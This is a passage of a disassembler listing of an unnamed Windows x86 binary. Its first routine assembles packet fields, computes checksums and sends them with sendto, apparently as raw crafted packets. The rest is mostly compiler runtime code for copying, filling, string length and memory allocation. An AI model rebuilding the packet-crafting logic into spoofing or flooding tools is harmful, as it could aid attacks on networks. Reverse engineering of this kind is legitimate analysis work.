mov [ebp+var_1C], di
call sub_429760
lea eax, [ebp+var_8]
push 4
push eax
lea eax, [ebp+var_1044]
push eax
call sub_429420
lea eax, [ebp+var_4]
push 4
push eax
lea eax, [ebp+var_1040]
push eax
call sub_429420
lea eax, [ebp+var_B]
push 1
push eax
lea eax, [ebp+var_103B]
push eax
call sub_429420
lea eax, [ebp+var_20]
push 2
push eax
lea eax, [ebp+var_103A]
push eax
call sub_429420
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_1038]
push eax
call sub_429420
movzx esi, word ptr [ebp+arg_4]
add esp, 48h
lea eax, [ebp+var_1024]
push esi
push [ebp+arg_0]
push eax
call sub_429420
lea eax, [esi+20h]
push eax
lea eax, [ebp+var_1044]
push eax
call sub_42904F
mov [ebp+var_1C], ax
push ebx
lea eax, [ebp+var_1044]
push edi
push eax
call sub_429760
lea eax, [ebp+var_14]
push 14h
push eax
lea eax, [ebp+var_1044]
push eax
call sub_429420
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_1030]
push eax
call sub_429420
push esi
lea eax, [ebp+var_101C]
push [ebp+arg_0]
push eax
call sub_429420
add esp, 44h
add esi, 34h
lea eax, [ebp+var_1044]
push esi
push eax
call sub_42904F
mov [ebp+var_A], ax
lea eax, [ebp+var_14]
push 14h
push eax
lea eax, [ebp+var_1044]
push eax
call sub_429420
push 10h
lea eax, [ebp+var_44]
push edi
push eax
call sub_429760
mov ax, [ebp+var_2A]
add esp, 20h
mov [ebp+var_42], ax
mov eax, [ebp+var_4]
mov [ebp+var_40], eax
lea eax, [ebp+var_44]
push 10h
push eax
movzx eax, word ptr [ebp+var_30]
push edi
push eax
lea eax, [ebp+var_1044]
mov [ebp+var_44], 2
push eax
push [ebp+var_18]
call dword_437294 ; sendto
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov esi, ecx
push 2
call dword_437190 ; Sleep
push [ebp+var_18]
loc_429042: ; DATA XREF: .text:0043A055�o
call dword_4372D8 ; closesocket
mov eax, esi
pop esi
pop ebx
loc_42904C: ; CODE XREF: sub_428DF8+48�j
pop edi
leave
retn
sub_428DF8 endp
; =============== S U B R O U T I N E =======================================
sub_42904F proc near ; CODE XREF: sub_428BFF+14A�p
; sub_428DF8+182�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_42907A
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+8+arg_0]
loc_42906D: ; CODE XREF: sub_42904F+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_42906D
pop edi
jmp short loc_42907E
; ---------------------------------------------------------------------------
loc_42907A: ; CODE XREF: sub_42904F+A�j
mov esi, [esp+4+arg_0]
loc_42907E: ; CODE XREF: sub_42904F+29�j
test ecx, ecx
jz short loc_429087
movzx eax, byte ptr [esi]
add edx, eax
loc_429087: ; CODE XREF: sub_42904F+31�j
mov ecx, edx
and edx, 0FFFFh
shr ecx, 20h
add ecx, edx
pop esi
mov eax, ecx
shr eax, 20h
add eax, ecx
not eax
retn
sub_42904F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4290A0 proc near ; CODE XREF: sub_40A737+39�p
; sub_40A737+6C�p ...
jmp dword_4370A0
sub_4290A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4290A6 proc near ; CODE XREF: sub_40A737+2E�p
; sub_41EFEF+3F�p
jmp dword_4370A4
sub_4290A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4290AC proc near ; CODE XREF: sub_40A737+1E�p
; sub_41EFEF+26�p ...
jmp dword_4370A8
sub_4290AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4290B2 proc near ; CODE XREF: sub_41F0F5+3A0�p
jmp dword_43711C
sub_4290B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4290B8 proc near ; CODE XREF: sub_41F0F5+8B�p
jmp dword_437120
sub_4290B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4290BE proc near ; CODE XREF: sub_428577+A0�p
; sub_428577+B1�p
jmp dword_4372EC
sub_4290BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4290C4 proc near ; CODE XREF: sub_405C99+83�p
; sub_405C99+121�p ...
jmp dword_43724C
sub_4290C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4290CA proc near ; CODE XREF: sub_41F0F5+D2�p
jmp dword_4372F8
sub_4290CA endp
; =============== S U B R O U T I N E =======================================
sub_4290D0 proc near ; CODE XREF: sub_415603+33�p
; sub_415641+33�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4298F2
pop ecx
retn
sub_4290D0 endp
; =============== S U B R O U T I N E =======================================
sub_4290DB proc near ; CODE XREF: sub_41B5C1+D�p
mov eax, offset loc_436694
call sub_42B7CC
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_41B4ED
mov esi, offset aStringTooLong ; "string too long"
push esi
call sub_4293A0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_41B525
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_41B24F
lea eax, [ebp-3Ch]
push offset dword_438638
push eax
mov dword ptr [ebp-3Ch], offset off_4373A4
call sub_42B8FA
pop esi
sub_4290DB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_429135 proc near ; CODE XREF: sub_429172+20�p
; DATA XREF: .text:0043863C�o
mov eax, offset loc_4366A8
call sub_42B7CC
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4373C4
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_41B4ED
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_42BA1B
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_429135 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429172 proc near ; DATA XREF: .text:004373AC�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4291AB
lea eax, [ebp+var_1C]
push offset dword_438638
push eax
call sub_42B8FA
loc_42918F: ; DATA XREF: .text:off_4373A4�o
push esi
mov esi, ecx
call sub_429135
test [esp+20h+var_18], 1
jz short loc_4291A5
push esi
call sub_4290D0
pop ecx
loc_4291A5: ; CODE XREF: sub_429172+2A�j
mov eax, esi
pop esi
retn 4
sub_429172 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4291AB proc near ; CODE XREF: sub_429172+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41B332
mov dword ptr [esi], offset off_4373A4
mov eax, esi
pop esi
retn 4
sub_4291AB endp
; =============== S U B R O U T I N E =======================================
sub_4291C3 proc near ; CODE XREF: sub_41B420+13�p
; sub_41B55A+E�p
; FUNCTION CHUNK AT 00429253 SIZE 0000000C BYTES
mov eax, offset loc_4366BC
call sub_42B7CC
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_41B4ED
mov esi, offset aInvalidStringP ; "invalid string position"
push esi
call sub_4293A0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_41B525
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_41B24F
lea eax, [ebp-3Ch]
push offset dword_438474
push eax
mov dword ptr [ebp-3Ch], offset off_4373D4
call sub_42B8FA
pop esi
loc_42921D: ; DATA XREF: .text:0043A00C�o
test byte_676C98, 1
jnz short loc_42922D
or byte_676C98, 1
loc_42922D: ; CODE XREF: sub_4291C3+61�j
call sub_429247
test byte_676C99, 1
jnz short loc_429242
or byte_676C99, 1
loc_429242: ; CODE XREF: sub_4291C3+76�j
jmp loc_429253
sub_4291C3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_429247 proc near ; CODE XREF: sub_4291C3:loc_42922D�p
push offset nullsub_1
call sub_42B869
pop ecx
retn
sub_429247 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291C3
loc_429253: ; CODE XREF: sub_4291C3:loc_429242�j
push offset nullsub_1
call sub_42B869
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_4291C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_429260 proc near ; CODE XREF: sub_423C7A+10A�p
; sub_423C7A+1C3�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_4292CF
retn 4
sub_429260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42926E proc near ; CODE XREF: sub_423C7A+12D�p
; sub_423C7A+239�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_4292C0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_450E20
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_4292C0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_4292C0
lea eax, [ebp+var_4]
push eax
push 0
call dword_437254
test eax, eax
jz short loc_4292C0
and [ebp+var_4], 0
loc_4292C0: ; CODE XREF: sub_42926E+D�j
; sub_42926E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_4292CF
leave
retn 0Ch
sub_42926E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4292CF proc near ; CODE XREF: sub_429260+6�p
; sub_42926E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4292F3
lea eax, [ebp+var_10]
push offset dword_4386E8
push eax
call sub_42B8FA
sub_4292CF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4292F3 proc near ; CODE XREF: sub_4292CF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_4373FC
test eax, eax
mov [esi+8], eax
jz short loc_42931F
cmp [esp+4+arg_8], 0
jz short loc_42931F
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_42931F: ; CODE XREF: sub_4292F3+1D�j
; sub_4292F3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_4292F3 endp
; =============== S U B R O U T I N E =======================================
sub_429325 proc near ; DATA XREF: .text:off_4373FC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_42936E
test [esp+4+arg_0], 1
jz short loc_42933B
push esi
call sub_4290D0
pop ecx
loc_42933B: ; CODE XREF: sub_429325+D�j
mov eax, esi
pop esi
retn 4
sub_429325 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_4373FC
jz short loc_429368
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_429368: ; CODE XREF: .text:00429360�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_42936E proc near ; CODE XREF: sub_429325+3�p
; DATA XREF: .text:004386EC�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_4373FC
test eax, eax
jz short loc_429384
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_429384: ; CODE XREF: sub_42936E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_429392
push esi
call dword_43703C ; LocalFree
loc_429392: ; CODE XREF: sub_42936E+1B�j
pop esi
retn
sub_42936E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4293A0 proc near ; CODE XREF: sub_4011E4+7�p
; sub_401B6E+28B�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4293C0
loc_4293AC: ; CODE XREF: sub_4293A0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_4293F3
test ecx, 3
jnz short loc_4293AC
add eax, 0
loc_4293C0: ; CODE XREF: sub_4293A0+A�j
; sub_4293A0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4293C0
mov eax, [ecx-4]
test al, al
jz short loc_429411
test ah, ah
jz short loc_429407
test eax, 0FF0000h
jz short loc_4293FD
test eax, 0FF000000h
jz short loc_4293F3
jmp short loc_4293C0
; ---------------------------------------------------------------------------
loc_4293F3: ; CODE XREF: sub_4293A0+11�j
; sub_4293A0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4293FD: ; CODE XREF: sub_4293A0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_429407: ; CODE XREF: sub_4293A0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_429411: ; CODE XREF: sub_4293A0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4293A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429420 proc near ; CODE XREF: sub_40100A+25�p
; sub_401044+2E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_429440
cmp edi, eax
jb loc_4295B8
loc_429440: ; CODE XREF: sub_429420+16�j
test edi, 3
jnz short loc_42945C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_42947C
rep movsd
jmp off_429568[edx*4]
; ---------------------------------------------------------------------------
loc_42945C: ; CODE XREF: sub_429420+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_429474
and eax, 3
add ecx, eax
jmp dword ptr loc_42947C+4[eax*4]
; ---------------------------------------------------------------------------
loc_429474: ; CODE XREF: sub_429420+46�j
jmp dword ptr loc_429578[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_42947C: ; CODE XREF: sub_429420+31�j
; sub_429420+8E�j ...
jmp off_4294FC[ecx*4]
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 94h, 42h, 0
dd offset loc_4294BC
dd offset loc_4294E0
; ---------------------------------------------------------------------------
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_42947C
rep movsd
jmp off_429568[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4294BC: ; DATA XREF: sub_429420+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_42947C
rep movsd
jmp off_429568[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4294E0: ; DATA XREF: sub_429420+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_42947C
rep movsd
jmp off_429568[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4294FC dd offset loc_42955F ; DATA XREF: sub_429420:loc_42947C�r
dd offset loc_42954C
dd offset loc_429544
dd offset loc_42953C
dd offset loc_429534
dd offset loc_42952C
dd offset loc_429524
dd offset loc_42951C
; ---------------------------------------------------------------------------
loc_42951C: ; CODE XREF: sub_429420:loc_42947C�j
; DATA XREF: sub_429420+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_429524: ; CODE XREF: sub_429420:loc_42947C�j
; DATA XREF: sub_429420+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_42952C: ; CODE XREF: sub_429420:loc_42947C�j
; DATA XREF: sub_429420+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_429534: ; CODE XREF: sub_429420:loc_42947C�j
; DATA XREF: sub_429420+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_42953C: ; CODE XREF: sub_429420:loc_42947C�j
; DATA XREF: sub_429420+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_429544: ; CODE XREF: sub_429420:loc_42947C�j
; DATA XREF: sub_429420+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_42954C: ; CODE XREF: sub_429420:loc_42947C�j
; DATA XREF: sub_429420+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42955F: ; CODE XREF: sub_429420:loc_42947C�j
; DATA XREF: sub_429420:off_4294FC�o
jmp off_429568[edx*4]
; ---------------------------------------------------------------------------
align 4
off_429568 dd offset loc_429578 ; DATA XREF: sub_429420+35�r
; sub_429420+92�r ...
dd offset loc_429580
dd offset loc_42958C
dd offset loc_4295A0
; ---------------------------------------------------------------------------
loc_429578: ; CODE XREF: sub_429420+35�j
; sub_429420+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_429580: ; CODE XREF: sub_429420+35�j
; sub_429420+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42958C: ; CODE XREF: sub_429420+35�j
; sub_429420+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4295A0: ; CODE XREF: sub_429420+35�j
; sub_429420+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4295B8: ; CODE XREF: sub_429420+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4295EC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4295E0
std
rep movsd
cld
jmp off_429700[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4295E0: ; CODE XREF: sub_429420+1B1�j
; sub_429420+208�j ...
neg ecx
jmp off_4296B0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4295EC: ; CODE XREF: sub_429420+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_429604
and eax, 3
sub ecx, eax
jmp dword ptr loc_429604+4[eax*4]
; ---------------------------------------------------------------------------
loc_429604: ; CODE XREF: sub_429420+1D6�j
; DATA XREF: sub_429420+1DD�r
jmp off_429700[ecx*4]
; ---------------------------------------------------------------------------
align 4
sbb [esi-69C7FFBEh], dl
inc edx
add [eax-6Ah], ah
inc edx
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4295E0
std
rep movsd
cld
jmp off_429700[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4295E0
std
rep movsd
cld
jmp off_429700[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4295E0
std
rep movsd
cld
jmp off_429700[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4296B4
dd offset loc_4296BC
dd offset loc_4296C4
dd offset loc_4296CC
dd offset loc_4296D4
dd offset loc_4296DC
dd offset loc_4296E4
off_4296B0 dd offset loc_4296F7 ; DATA XREF: sub_429420+1C2�r
; ---------------------------------------------------------------------------
loc_4296B4: ; DATA XREF: sub_429420+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4296BC: ; DATA XREF: sub_429420+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4296C4: ; DATA XREF: sub_429420+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4296CC: ; DATA XREF: sub_429420+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4296D4: ; DATA XREF: sub_429420+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4296DC: ; DATA XREF: sub_429420+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4296E4: ; DATA XREF: sub_429420+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4296F7: ; CODE XREF: sub_429420+1C2�j
; DATA XREF: sub_429420:off_4296B0�o
jmp off_429700[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_429700 dd offset loc_429710 ; DATA XREF: sub_429420+1B7�r
; sub_429420:loc_429604�r ...
dd offset loc_429718
dd offset loc_429728
dd offset loc_42973C
; ---------------------------------------------------------------------------
loc_429710: ; CODE XREF: sub_429420+1B7�j
; sub_429420:loc_429604�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_429718: ; CODE XREF: sub_429420+1B7�j
; sub_429420:loc_429604�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_429728: ; CODE XREF: sub_429420+1B7�j
; sub_429420:loc_429604�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42973C: ; CODE XREF: sub_429420+1B7�j
; sub_429420:loc_429604�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_429420 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_429760 proc near ; CODE XREF: sub_40100A+1A�p
; sub_401044+22�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4297B3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4297A7
neg ecx
and ecx, 3
jz short loc_429789
sub edx, ecx
loc_429783: ; CODE XREF: sub_429760+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_429783
loc_429789: ; CODE XREF: sub_429760+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4297A7
rep stosd
test edx, edx
jz short loc_4297AD
loc_4297A7: ; CODE XREF: sub_429760+18�j
; sub_429760+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4297A7
loc_4297AD: ; CODE XREF: sub_429760+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4297B3: ; CODE XREF: sub_429760+A�j
mov eax, [esp+arg_0]
retn
sub_429760 endp
; =============== S U B R O U T I N E =======================================
sub_4297B8 proc near ; CODE XREF: sub_40100A+A�p
; sub_401044+12�p ...
arg_0 = dword ptr 4
push dword_676930
push [esp+4+arg_0]
call sub_4297CA
pop ecx
pop ecx
retn
sub_4297B8 endp
; =============== S U B R O U T I N E =======================================
sub_4297CA proc near ; CODE XREF: sub_4297B8+A�p
; sub_42B4D7+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_4297F3
loc_4297D1: ; CODE XREF: sub_4297CA+27�j
push [esp+arg_0]
call sub_4297F6
test eax, eax
pop ecx
jnz short locret_4297F5
cmp [esp+arg_4], eax
jz short locret_4297F5
push [esp+arg_0]
call sub_42C6C5
test eax, eax
pop ecx
jnz short loc_4297D1
loc_4297F3: ; CODE XREF: sub_4297CA+5�j
xor eax, eax
locret_4297F5: ; CODE XREF: sub_4297CA+13�j
; sub_4297CA+19�j
retn
sub_4297CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4297F6 proc near ; CODE XREF: sub_4297CA+B�p
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00429866 SIZE 00000053 BYTES
; FUNCTION CHUNK AT 004298C5 SIZE 0000002D BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437400
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov eax, dword_677004
cmp eax, 3
jnz short loc_429866
mov esi, [ebp+arg_0]
cmp esi, dword_676FFC
ja loc_4298C5
push 9
call sub_42DAEF
pop ecx
and [ebp+var_4], 0
push esi
call sub_42CC4E
pop ecx
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_42985D
mov eax, [ebp+var_1C]
test eax, eax
jz short loc_4298C5
jmp loc_4298E3
sub_4297F6 endp
; =============== S U B R O U T I N E =======================================
sub_42985D proc near ; CODE XREF: sub_4297F6+56�p
; DATA XREF: .text:00437408�o
push 9
call sub_42DB50
pop ecx
retn
sub_42985D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4297F6
loc_429866: ; CODE XREF: sub_4297F6+2B�j
cmp eax, 2
jnz short loc_4298C5
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_42987A
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_42987D
; ---------------------------------------------------------------------------
loc_42987A: ; CODE XREF: sub_4297F6+7A�j
push 10h
pop esi
loc_42987D: ; CODE XREF: sub_4297F6+82�j
mov [ebp+arg_0], esi
cmp esi, dword_453174
ja short loc_4298B6
push 9
call sub_42DAEF
pop ecx
mov [ebp+var_4], 1
mov eax, esi
shr eax, 4
push eax
call sub_42D6F1
pop ecx
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_4298BC
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_4298E3
loc_4298B6: ; CODE XREF: sub_4297F6+90�j
push esi
jmp short loc_4298D5
; END OF FUNCTION CHUNK FOR sub_4297F6
; =============== S U B R O U T I N E =======================================
sub_4298B9 proc near ; DATA XREF: .text:00437414�o
mov esi, [ebp+8]
sub_4298B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4298BC proc near ; CODE XREF: sub_4297F6+B4�p
push 9
call sub_42DB50
pop ecx
retn
sub_4298BC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4297F6
loc_4298C5: ; CODE XREF: sub_4297F6+36�j
; sub_4297F6+60�j ...
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_4298CF
push 1
pop eax
loc_4298CF: ; CODE XREF: sub_4297F6+D4�j
add eax, 0Fh
and al, 0F0h
push eax
loc_4298D5: ; CODE XREF: sub_4297F6+C1�j
push 0
push dword_677000
call dword_437210 ; RtlAllocateHeap
loc_4298E3: ; CODE XREF: sub_4297F6+62�j
; sub_4297F6+BE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4297F6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4298F2 proc near ; CODE XREF: sub_401099+A�p
; sub_4010B2+73�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
